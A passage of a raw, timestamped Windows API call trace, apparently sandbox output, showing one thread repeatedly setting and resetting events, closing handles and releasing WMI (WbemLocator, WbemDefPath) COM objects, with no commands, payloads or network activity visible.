returned 0x9f0 [0062.133] GetCurrentThreadId () returned 0x9f0 [0062.133] SetEvent (hEvent=0xbc) returned 1 [0062.133] SetEvent (hEvent=0xb8) returned 1 [0062.133] CloseHandle (hObject=0x1fc) returned 1 [0062.133] GetCurrentThreadId () returned 0x9f0 [0062.133] ResetEvent (hEvent=0xb8) returned 1 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] ResetEvent (hEvent=0xb8) returned 1 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] SetEvent (hEvent=0xbc) returned 1 [0062.134] SetEvent (hEvent=0xb8) returned 1 [0062.134] CloseHandle (hObject=0x1fc) returned 1 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] ResetEvent (hEvent=0xb8) returned 1 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] ResetEvent (hEvent=0xb8) returned 1 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] SetEvent (hEvent=0xbc) returned 1 [0062.134] SetEvent (hEvent=0xb8) returned 1 [0062.134] CloseHandle (hObject=0x200) returned 1 [0062.134] GetCurrentThreadId () returned 0x9f0 [0062.134] ResetEvent (hEvent=0xb8) returned 1 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] ResetEvent (hEvent=0xb8) returned 1 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] SetEvent (hEvent=0xbc) returned 1 [0062.135] SetEvent (hEvent=0xb8) returned 1 [0062.135] CloseHandle (hObject=0x1fc) returned 1 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] ResetEvent (hEvent=0xb8) returned 1 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] ResetEvent (hEvent=0xb8) returned 1 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] GetCurrentThreadId () returned 0x9f0 [0062.135] SetEvent (hEvent=0xbc) returned 1 [0062.135] SetEvent (hEvent=0xb8) returned 1 [0062.135] CloseHandle (hObject=0x1fc) returned 1 [0062.764] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0133.798] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0133.798] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.798] WbemLocator:IUnknown:Release (This=0x6720d60) returned 0x1 [0133.799] WbemLocator:IUnknown:Release (This=0x6720d60) returned 0x0 [0133.799] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.799] WbemLocator:IUnknown:Release (This=0x6720a80) returned 0x1 [0133.799] WbemLocator:IUnknown:Release (This=0x6720a80) returned 0x0 [0133.799] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.799] IUnknown:Release (This=0x672f668) returned 0x2 [0133.799] IUnknown:Release (This=0x672f668) returned 0x1 [0133.799] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.799] WbemLocator:IUnknown:Release (This=0x6720d70) returned 0x1 [0133.799] WbemLocator:IUnknown:Release (This=0x6720d70) returned 0x0 [0133.799] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.799] IUnknown:Release (This=0x6730d38) returned 0x2 [0133.799] IUnknown:Release (This=0x6730d38) returned 0x1 [0133.799] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.799] WbemLocator:IUnknown:Release (This=0x672ccd0) returned 0x1 [0133.799] WbemLocator:IUnknown:Release (This=0x672ccd0) returned 0x0 [0133.799] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.799] IUnknown:Release (This=0x6736b00) returned 0x2 [0133.799] IUnknown:Release (This=0x6736b00) returned 0x1 [0133.799] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.799] IUnknown:Release (This=0x6732be0) returned 0x2 [0133.799] IUnknown:Release (This=0x6732be0) returned 0x1 [0133.799] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.799] IUnknown:Release (This=0x6732f20) returned 0x2 [0133.800] IUnknown:Release (This=0x6732f20) returned 0x1 [0133.800] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.800] IUnknown:Release (This=0x6737180) returned 0x2 [0133.800] IUnknown:Release (This=0x6737180) returned 0x1 [0133.800] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.800] IUnknown:Release (This=0x6737800) returned 0x2 [0133.800] IUnknown:Release (This=0x6737800) returned 0x1 [0133.800] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.800] IUnknown:Release (This=0x6737b50) returned 0x2 [0133.800] IUnknown:Release (This=0x6737b50) returned 0x1 [0133.800] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.800] IUnknown:Release (This=0x6738e30) returned 0x2 [0133.800] IUnknown:Release (This=0x6738e30) returned 0x1 [0133.800] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.800] IUnknown:Release (This=0x673a918) returned 0x2 [0133.800] IUnknown:Release (This=0x673a918) returned 0x1 [0133.800] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.800] IUnknown:Release (This=0x673ac00) returned 0x2 [0133.800] IUnknown:Release (This=0x673ac00) returned 0x1 [0133.800] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.800] IUnknown:Release (This=0x6739110) returned 0x2 [0133.800] IUnknown:Release (This=0x6739110) returned 0x1 [0133.800] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.800] IUnknown:Release (This=0x6739328) returned 0x2 [0133.800] IUnknown:Release (This=0x6739328) returned 0x1 [0133.800] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.800] IUnknown:Release (This=0x673afa0) returned 0x2 [0133.800] IUnknown:Release (This=0x673afa0) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673b138) returned 0x2 [0133.801] IUnknown:Release (This=0x673b138) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673b2d0) returned 0x2 [0133.801] IUnknown:Release (This=0x673b2d0) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673b468) returned 0x2 [0133.801] IUnknown:Release (This=0x673b468) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673b600) returned 0x2 [0133.801] IUnknown:Release (This=0x673b600) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673b798) returned 0x2 [0133.801] IUnknown:Release (This=0x673b798) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673b930) returned 0x2 [0133.801] IUnknown:Release (This=0x673b930) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673bac8) returned 0x2 [0133.801] IUnknown:Release (This=0x673bac8) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673bc60) returned 0x2 [0133.801] IUnknown:Release (This=0x673bc60) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673bdf8) returned 0x2 [0133.801] IUnknown:Release (This=0x673bdf8) returned 0x1 [0133.801] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.801] IUnknown:Release (This=0x673bf90) returned 0x2 [0133.801] IUnknown:Release (This=0x673bf90) returned 0x1 [0133.802] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.802] IUnknown:Release (This=0x673c128) returned 0x2 [0133.802] IUnknown:Release (This=0x673c128) returned 0x1 [0133.802] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0133.802] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.802] WbemDefPath:IUnknown:Release (This=0x6730268) returned 0x1 [0133.802] WbemDefPath:IUnknown:Release (This=0x6730268) returned 0x0 [0133.802] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.802] WbemDefPath:IUnknown:Release (This=0x6730328) returned 0x1 [0133.802] WbemDefPath:IUnknown:Release (This=0x6730328) returned 0x0 [0133.803] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0133.803] WbemDefPath:IUnknown:Release (This=0x67303e8) returned 0x1 [0133.803] WbemDefPath:IUnknown:Release (This=0x67303e8) returned 0x0 [0133.803] IUnknown:Release (This=0x6739328) returned 0x0 [0133.804] IUnknown:Release (This=0x672efb0) returned 0x0 [0133.804] IUnknown:Release (This=0x6739110) returned 0x0 [0133.804] IUnknown:Release (This=0x673ac00) returned 0x0 [0133.804] IUnknown:Release (This=0x673a918) returned 0x0 [0133.804] IUnknown:Release (This=0x6738e30) returned 0x0 [0133.804] IUnknown:Release (This=0x6737b50) returned 0x0 [0133.804] IUnknown:Release (This=0x6737800) returned 0x0 [0133.805] IUnknown:Release (This=0x6737180) returned 0x0 [0133.805] IUnknown:Release (This=0x6732f20) returned 0x0 [0133.805] IUnknown:Release (This=0x6732be0) returned 0x0 [0133.805] IUnknown:Release (This=0x6736b00) returned 0x0 [0133.805] CoGetContextToken (in: pToken=0x558f6b0 | out: pToken=0x558f6b0) returned 0x0 [0133.805] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x1 [0133.805] IUnknown:Release (This=0x67369fc) returned 0x0 [0133.861] CoGetContextToken (in: pToken=0x558f6b0 | out: pToken=0x558f6b0) returned 0x0 [0133.861] WbemLocator:IUnknown:Release (This=0x77171c) returned 0x1 [0133.861] IUnknown:Release (This=0x672cc94) returned 0x0 [0133.862] IUnknown:Release (This=0x6736720) returned 0x0 [0133.862] IUnknown:Release (This=0x673c128) returned 0x0 [0133.862] IUnknown:Release (This=0x673bf90) returned 0x0 [0133.862] CloseHandle (hObject=0x460) returned 1 [0133.863] IUnknown:Release (This=0x673bdf8) returned 0x0 [0133.863] IUnknown:Release (This=0x673bc60) returned 0x0 [0133.863] IUnknown:Release (This=0x673bac8) returned 0x0 [0133.863] IUnknown:Release (This=0x673b930) returned 0x0 [0133.863] IUnknown:Release (This=0x673b798) returned 0x0 [0133.863] IUnknown:Release (This=0x673b600) returned 0x0 [0133.864] IUnknown:Release (This=0x673b468) returned 0x0 [0133.869] IUnknown:Release (This=0x673b2d0) returned 0x0 [0133.869] IUnknown:Release (This=0x6730d38) returned 0x0 [0133.869] IUnknown:Release (This=0x673b138) returned 0x0 [0133.869] CoGetContextToken (in: pToken=0x558f6b0 | out: pToken=0x558f6b0) returned 0x0 [0133.869] WbemLocator:IUnknown:Release (This=0x7768e4) returned 0x1 [0133.869] IUnknown:Release (This=0x672fbdc) returned 0x0 [0133.870] IUnknown:Release (This=0x672f668) returned 0x0 [0133.870] IUnknown:Release (This=0x673afa0) returned 0x0 [0133.871] CloseHandle (hObject=0x478) returned 1 [0133.872] CloseHandle (hObject=0x25c) returned 1 [0133.872] CloseHandle (hObject=0x458) returned 1 [0133.873] CloseHandle (hObject=0x390) returned 1 [0133.873] CloseHandle (hObject=0x27c) returned 1 [0133.873] CloseHandle (hObject=0x2a0) returned 1 [0133.873] CloseHandle (hObject=0x464) returned 1 [0133.873] CloseHandle (hObject=0x29c) returned 1 [0133.873] CloseHandle (hObject=0x3b4) returned 1 [0133.873] CloseHandle (hObject=0x298) returned 1 [0133.874] CloseHandle (hObject=0x278) returned 1 [0133.874] CloseHandle (hObject=0x294) returned 1 [0133.874] CloseHandle (hObject=0x274) returned 1 [0133.874] CloseHandle (hObject=0x3a8) returned 1 [0133.874] CloseHandle (hObject=0x270) returned 1 [0133.874] CloseHandle (hObject=0x290) returned 1 [0133.874] CloseHandle (hObject=0x26c) returned 1 [0133.874] CloseHandle (hObject=0x468) returned 1 [0133.875] CloseHandle (hObject=0x268) returned 1 [0133.875] CloseHandle (hObject=0x28c) returned 1 [0133.875] CloseHandle (hObject=0x264) returned 1 [0133.875] CloseHandle (hObject=0x384) returned 1 [0133.875] CloseHandle (hObject=0x260) returned 1 [0133.875] CloseHandle (hObject=0x284) returned 1 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] ResetEvent (hEvent=0xb8) returned 1 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] ResetEvent (hEvent=0xb8) returned 1 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] SetEvent (hEvent=0xbc) returned 1 [0133.876] SetEvent (hEvent=0xb8) returned 1 [0133.876] CloseHandle (hObject=0x4b8) returned 1 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] ResetEvent (hEvent=0xb8) returned 1 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] ResetEvent (hEvent=0xb8) returned 1 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] GetCurrentThreadId () returned 0x9f0 [0133.876] SetEvent (hEvent=0xbc) returned 1 [0133.876] SetEvent (hEvent=0xb8) returned 1 [0133.876] CloseHandle (hObject=0x4a8) returned 1 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] ResetEvent (hEvent=0xb8) returned 1 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] ResetEvent (hEvent=0xb8) returned 1 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] SetEvent (hEvent=0xbc) returned 1 [0133.877] SetEvent (hEvent=0xb8) returned 1 [0133.877] CloseHandle (hObject=0x4ac) returned 1 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] ResetEvent (hEvent=0xb8) returned 1 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] ResetEvent (hEvent=0xb8) returned 1 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] SetEvent (hEvent=0xbc) returned 1 [0133.877] SetEvent (hEvent=0xb8) returned 1 [0133.877] CloseHandle (hObject=0x4b0) returned 1 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] ResetEvent (hEvent=0xb8) returned 1 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] ResetEvent (hEvent=0xb8) returned 1 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] GetCurrentThreadId () returned 0x9f0 [0133.877] SetEvent (hEvent=0xbc) returned 1 [0133.878] SetEvent (hEvent=0xb8) returned 1 [0133.878] CloseHandle (hObject=0x4b4) returned 1 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] ResetEvent (hEvent=0xb8) returned 1 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] ResetEvent (hEvent=0xb8) returned 1 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] SetEvent (hEvent=0xbc) returned 1 [0133.878] SetEvent (hEvent=0xb8) returned 1 [0133.878] CloseHandle (hObject=0x4e4) returned 1 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] ResetEvent (hEvent=0xb8) returned 1 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] ResetEvent (hEvent=0xb8) returned 1 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.878] GetCurrentThreadId () returned 0x9f0 [0133.879] SetEvent (hEvent=0xbc) returned 1 [0133.879] SetEvent (hEvent=0xb8) returned 1 [0133.879] CloseHandle (hObject=0x4d4) returned 1 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] ResetEvent (hEvent=0xb8) returned 1 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] ResetEvent (hEvent=0xb8) returned 1 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] SetEvent (hEvent=0xbc) returned 1 [0133.879] SetEvent (hEvent=0xb8) returned 1 [0133.879] CloseHandle (hObject=0x4d8) returned 1 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] ResetEvent (hEvent=0xb8) returned 1 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] ResetEvent (hEvent=0xb8) returned 1 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] SetEvent (hEvent=0xbc) returned 1 [0133.879] SetEvent (hEvent=0xb8) returned 1 [0133.879] CloseHandle (hObject=0x4dc) returned 1 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] ResetEvent (hEvent=0xb8) returned 1 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] GetCurrentThreadId () returned 0x9f0 [0133.879] ResetEvent (hEvent=0xb8) returned 1 [0133.880] GetCurrentThreadId () returned 0x9f0 [0133.880] GetCurrentThreadId () returned 0x9f0 [0133.880] SetEvent (hEvent=0xbc) returned 1 [0133.880] SetEvent (hEvent=0xb8) returned 1 [0133.880] CloseHandle (hObject=0x4e0) returned 1 [0139.130] GetCurrentThreadId () returned 0x9f0 [0139.130] ResetEvent (hEvent=0xb8) returned 1 [0139.130] GetCurrentThreadId () returned 0x9f0 [0139.130] GetCurrentThreadId () returned 0x9f0 [0139.130] GetCurrentThreadId () returned 0x9f0 [0139.130] GetCurrentThreadId () returned 0x9f0 [0139.130] ResetEvent (hEvent=0xb8) returned 1 [0139.130] GetCurrentThreadId () returned 0x9f0 [0139.130] GetCurrentThreadId () returned 0x9f0 [0139.130] SetEvent (hEvent=0xbc) returned 1 [0139.130] SetEvent (hEvent=0xb8) returned 1 [0139.130] CloseHandle (hObject=0x4ec) returned 1 [0139.131] GetCurrentThreadId () returned 0x9f0 [0139.131] ResetEvent (hEvent=0xb8) returned 1 [0139.131] GetCurrentThreadId () returned 0x9f0 [0139.131] GetCurrentThreadId () returned 0x9f0 [0139.131] GetCurrentThreadId () returned 0x9f0 [0139.131] GetCurrentThreadId () returned 0x9f0 [0139.131] ResetEvent (hEvent=0xb8) returned 1 [0139.131] GetCurrentThreadId () returned 0x9f0 [0139.131] GetCurrentThreadId () returned 0x9f0 [0139.131] SetEvent (hEvent=0xbc) returned 1 [0139.131] SetEvent (hEvent=0xb8) returned 1 [0139.131] CloseHandle (hObject=0x4a4) returned 1 [0139.136] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0139.136] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.136] WbemDefPath:IUnknown:Release (This=0x6720820) returned 0x1 [0139.136] WbemDefPath:IUnknown:Release (This=0x6720820) returned 0x0 [0139.136] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.136] WbemDefPath:IUnknown:Release (This=0x6720ba0) returned 0x1 [0139.136] WbemDefPath:IUnknown:Release (This=0x6720ba0) returned 0x0 [0139.136] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.136] WbemDefPath:IUnknown:Release (This=0x672f5a0) returned 0x1 [0139.136] WbemDefPath:IUnknown:Release (This=0x672f5a0) returned 0x0 [0139.137] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.137] WbemDefPath:IUnknown:Release (This=0x6730040) returned 0x1 [0139.137] WbemDefPath:IUnknown:Release (This=0x6730040) returned 0x0 [0139.137] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.137] WbemDefPath:IUnknown:Release (This=0x6730c70) returned 0x1 [0139.137] WbemDefPath:IUnknown:Release (This=0x6730c70) returned 0x0 [0139.137] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.137] WbemDefPath:IUnknown:Release (This=0x6736648) returned 0x1 [0139.137] WbemDefPath:IUnknown:Release (This=0x6736648) returned 0x0 [0139.137] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.137] WbemDefPath:IUnknown:Release (This=0x6736c98) returned 0x1 [0139.137] WbemDefPath:IUnknown:Release (This=0x6736c98) returned 0x0 [0139.137] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.137] WbemDefPath:IUnknown:Release (This=0x6732e38) returned 0x1 [0139.137] WbemDefPath:IUnknown:Release (This=0x6732e38) returned 0x0 [0139.137] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.137] WbemDefPath:IUnknown:Release (This=0x6733180) returned 0x1 [0139.137] WbemDefPath:IUnknown:Release (This=0x6733180) returned 0x0 [0139.137] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.137] WbemDefPath:IUnknown:Release (This=0x6737718) returned 0x1 [0139.137] WbemDefPath:IUnknown:Release (This=0x6737718) returned 0x0 [0139.137] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.137] WbemDefPath:IUnknown:Release (This=0x6737a68) returned 0x1 [0139.137] WbemDefPath:IUnknown:Release (This=0x6737a68) returned 0x0 [0139.137] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.137] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x1 [0139.137] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x0 [0139.138] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.138] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x1 [0139.138] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x0 [0139.138] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.138] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x1 [0139.138] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x0 [0139.138] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.138] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x1 [0139.138] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x0 [0139.138] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.138] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x1 [0139.138] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x0 [0139.138] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.138] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x1 [0139.138] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x0 [0139.138] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.138] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x1 [0139.138] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x0 [0139.138] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.138] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x1 [0139.138] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x0 [0139.138] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.138] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x1 [0139.138] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x0 [0139.138] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.138] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x1 [0139.138] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x1 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.139] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x1 [0139.139] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x1 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x1 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.139] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x1 [0139.139] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.139] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x1 [0139.139] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x1 [0139.139] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0139.139] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.139] WbemLocator:IUnknown:Release (This=0x76b0e4) returned 0x1 [0139.139] WbemLocator:IUnknown:Release (This=0x672d544) returned 0x0 [0139.216] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.216] WbemLocator:IUnknown:Release (This=0x77162c) returned 0x1 [0139.216] WbemLocator:IUnknown:Release (This=0x672f58c) returned 0x0 [0139.218] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.218] WbemLocator:IUnknown:Release (This=0x77217c) returned 0x1 [0139.218] WbemLocator:IUnknown:Release (This=0x672f8bc) returned 0x0 [0139.220] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.220] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0139.220] WbemLocator:IUnknown:Release (This=0x673670c) returned 0x0 [0139.220] CoGetContextToken (in: 